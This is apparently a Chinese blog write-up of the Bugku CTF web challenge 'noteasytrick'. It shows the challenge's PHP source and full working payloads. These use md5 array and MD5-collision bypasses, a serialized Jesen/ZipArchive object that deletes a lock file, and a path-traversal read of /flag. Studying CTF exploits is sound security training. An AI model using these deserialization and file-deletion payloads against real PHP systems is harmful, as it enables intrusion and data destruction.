ctf-WEB-noteasytrick

最新推荐文章于 2023-04-30 16:25:06 发布
最新推荐文章于 2023-04-30 16:25:06 发布
阅读量1.3k 收藏 1
点赞数 1
分类专栏: ctf 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_001/article/details/124771962
版权

题目链接:跳转提示
 

 打开网址,可以直接看到网页链接:
 

<?php
error_reporting(0);
ini_set("display_errors","Off");
class Jesen {
    public $filename;
    public $content;
    public $me;

    function __wakeup(){
        $this->me = new Ctf();
    }
    function __destruct() {
        $this->me->open($this->filename,$this->content);
    }
}

class Ctf {
    function __toString() {
        return "die";
    }
    function open($filename, $content){
        if(!file_get_contents("./sandbox/lock.lock")){
            echo file_get_contents(substr($_POST['b'],0,30));
            die();
        }else{
            file_put_contents("./sandbox/".md5($filename.time()),$content);
            die("or you can guess the final filename?"); 
        }
        
    }
}

if(!isset($_POST['a'])){
    highlight_file(__FILE__);
    die();
}else{
    if(($_POST['b'] != $_POST['a']) && (md5($_POST['b']) === md5($_POST['a']))){
        unserialize($_POST['c']);
    }

}

代码分析,需要绕过两个判断条件,第一个需要a不等于b,但a与b的MD5一样,因为md5()函数无法处理数组,只要使a与b是两个不同的数组,md5(a)与md5(b)都返回0,则等号成立;

第二个判断条件,输入http://114.67.175.224:12378/sandbox/lock.lock,可以发现该文件存在,当./sandbox/lock.lock文件不存在时,就可以利用file_get_contents()输出/flag里的内容

要想办法删除文件,可以利用php内置类ZipArchive,这是一个专门用于文件压缩和解压缩的类,刚好他的open函数open(filename,8),会删除相应文件,其序列化内容:O:10:"ZipArchive":5:{s:6:"status";i:0;s:9:"statusSys";i:0;s:8:"numFiles";i:0;s:8:"filename";s:0:"";s:7:"comment";s:0:"";}

因此payload: a[]=[1]&b[]=[2]&c=O:5:"Jesen":4:{s:8:"filename";s:19:"./sandbox/lock.lock";s:7:"content";i:8;s:2:"me";O:10:"ZipArchive":5:{s:6:"status";i:0;s:9:"statusSys";i:0;s:8:"numFiles";i:0;s:8:"filename";s:0:"";s:7:"comment";s:0:"";}}(这里需要输入错误的Jesen属性数,以绕过wakeup函数)

输入网址查询http://114.67.175.224:12378/sandbox/lock.lock,发现文件不存在

利用fastcoll生成两个相同的MD5码的a和b,并保证b的前30字符是flag路径:
payload:

a=.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%FEv%CA%A8%12%C1W%8BA%26Y%81%98h%CF%09%BC%AF%C2%F7%F1%F8%D2%06%2Fvyv%2B%96.%B2%D8%EA%C6%EB%ECj%15%F9%0B%06OT%92%91T%FB%A4%C3V%29%E6%83%84%26J%D9O%81%D9%7F%06%EC%DB1%B7%84%E8%16%A5%09%90VC%F4W%98%D5%AD%88%F2.%A7%0D%C8%7C%EE%24e%21%27%CC%B7%DD%CDU%2F%7E%28%D3%95%A1%A5%CE%86%D9%29%8E%C0j%7F%F9%14%D8%9Fu%C9C%F3y%9BQ%F1%7C%1D%DD%AD&b=.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%FEv%CA%A8%12%C1W%8BA%26Y%81%98h%CF%09%BC%AF%C2w%F1%F8%D2%06%2Fvyv%2B%96.%B2%D8%EA%C6%EB%ECj%15%F9%0B%06OT%92%11U%FB%A4%C3V%29%E6%83%84%26J%D9O%01%D9%7F%06%EC%DB1%B7%84%E8%16%A5%09%90VC%F4W%98%D5%AD%88%F2.%27%0D%C8%7C%EE%24e%21%27%CC%B7%DD%CDU%2F%7E%28%D3%95%A1%A5%CE%86%D9%29%8E%40j%7F%F9%14%D8%9Fu%C9C%F3y%9BQq%7C%1D%DD%AD&c=O:5:"Jesen":3:{s:8:"filename";N;s:7:"content";N;s:2:"me";N;}

得到结果

(不能直接复制生成的文章内容进行加密,因为编码不一样)

榴莲 蛋挞
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
ctf 点击1000000次
西部壮仔的博客
06-09 1462
废话不多说,我们直接看题 看这个题目的意思是当我们去点击1000000次屏幕flag就会出现 当然我们不可能去真的去点击1000000次 我们查看一下这个网页的源代码,看是否能得到一些提示 当变量clicks加到1000000的时候就会执行if判断语句的代码,我们可以通过控制台直接把clicks的值直接变成1000000 输入1000000回车,在点一下屏幕 flag就出来了 ...
bugku ctf Web POST 解题思路
m0_73734159的博客
10-12 530
bugku ctf post j解题思路
CTFWeb方向练习题)(持续更新)
m0_56010012的博客
02-23 5068
1.Training-WWW-Robots 打开应用场景,如下: 网址后面添加/robots.txt 查看其中内容(robots协议也叫robots.txt(统一小写)是一种存放于网站根目录下的ASCII编码的文本文件),内容如下: 根据提示,访问/fl0g.php,得到flag值。 ...
应用于Firefox浏览器关于burpsuite的代理问题-详解
m0_73734159的博客
04-30 3289
在最近打ctf网安比赛的时候发现burp不能用了。我这里出现了两种情况 当时啊,我寻思这我之前物理机没有安装这个火狐浏览器的时候可以抓包爆破,总之什么都可以,但是最近我在物理机上安装了个火狐浏览器,然后做ctf题的时候发现burp就什么都干不了,随之我觉得难不成是物理机和虚拟机两者的火狐浏览器发生冲突了?(菜鸡饶头)没错最后我把物理机上的火狐浏览器给卸载了,显然最后我失败了,根本行不通。然后我去给虚拟机上的火狐浏览器进行网络设置,(火狐首选项-常规-最下面网络设置-设置) 不管怎么设置,最后也是无用之举
ctf初学者】
shangdema的博客
09-04 533
梦之光芒的黑客小游戏学习过程
CTF-web学习大纲
01-30
CTF-web学习大纲
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
在这个"CTF-Web-Challenge"中,你将有机会学习和实践如何在Web环境中识别和利用漏洞。 PHP是一种广泛使用的服务器端脚本语言,特别适合开发动态网站。在CTF挑战中,你可能会遇到的PHP相关知识点包括: 1. **PHP...
bugkuctf | noteasytrick 反序列化漏洞
菜鸡一枚
02-19 392
bugku-noteasytrick 反序列化漏洞,利用ZipArchive内置类删文件,fastcoll构造同md5不同内容文件绕过判断
bugctfweb方向题目记录
wanan的博客
10-06 622
bugctfweb方向题目记录
魔术方法总结
梦里不知身是客
12-26 9847
__construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(
Bugku noteasytrick
明裕学长的博客
05-09 437
打开环境 <?php error_reporting(0); ini_set("display_errors","Off"); class Jesen { public $filename; public $content; public $me; function __wakeup(){ $this->me = new Ctf(); } function __destruct() { $this->me
CTF之序列化__toString
yyj1781572的博客
12-04 993
CTF之序列化__toString
bugku_noteasytrick
weixin_50076644的博客
07-29 538
bugku_web_noteasytrick
Bugku WEB noteasytrick
qq_41696858的博客
07-30 513
首先感谢大佬的文章,我是一直卡在如何删除lock文件,先放传送门: https://blog.csdn.net/qq_53460654/article/details/116798346 这题的主要考点数ZipArchive类用open方法删除文件和fastcoll工具的运用 <?php error_reporting(0); ini_set("display_errors","Off"); class Jesen { public $filename; public $content
ciscn2020复现-web-Easytrick
qq_44657899的博客
08-24 770
文章目录0x01 INF绕过0x02 php精度绕过 源码如下: <?php class trick{ public $trick1; public $trick2; public function __destruct(){ $this->trick1 = (string)$this->trick1; if(strlen($this->trick1) > 5 || strlen($this->trick2) &g
ctf-qsnctf此地无银三百
最新发布
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榴莲 蛋挞

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值